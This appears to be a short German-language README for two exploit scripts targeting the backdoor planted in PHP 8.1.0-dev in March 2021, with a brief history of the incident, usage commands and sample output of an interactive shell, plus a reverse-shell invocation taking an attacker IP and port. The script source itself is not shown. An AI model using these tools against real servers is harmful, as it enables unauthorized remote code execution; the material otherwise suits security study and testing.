
PHP 8.1.0-dev Backdoor System Shell Script
PHP 8.1.0-dev Backdoor-System-Shell-Skript

PHP Version 8.1.0-dev wurde am 28. März 2021 mit einer Hintertür veröffentlicht, aber die Hintertür wurde schnell entdeckt und entfernt. Wenn diese Version von PHP auf einem Server läuft, kann ein Angreifer beliebigen Code ausführen, indem er den User-Agentt-Header sendet.
Der ursprüngliche Code wurde nach der Entdeckung des Problems wiederhergestellt, aber dann ein zweites Mal manipuliert. Der Einbruch hätte in allen Websites, die die kompromittierte Version von PHP ausführten, eine Hintertür erzeugt und es Hackern ermöglicht, Remote Code Execution auf der Website durchzuführen.
Vollständigen Artikel lesen: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Dieses kurze Exploit-Skript backdoor_php_8.1.0-dev.py verwendet die Hintertür, um eine Pseudo-System-Shell auf dem Host bereitzustellen. Finden Sie es auf Exploit DB.
Verwendung:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Dieses kurze Exploit-Skript revshell_php_8.1.0-dev.py erzeugt eine Reverse-Shell auf dem Zielsystem.
Verwendung:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

Sei neugierig, Lernen ist Leben! 😃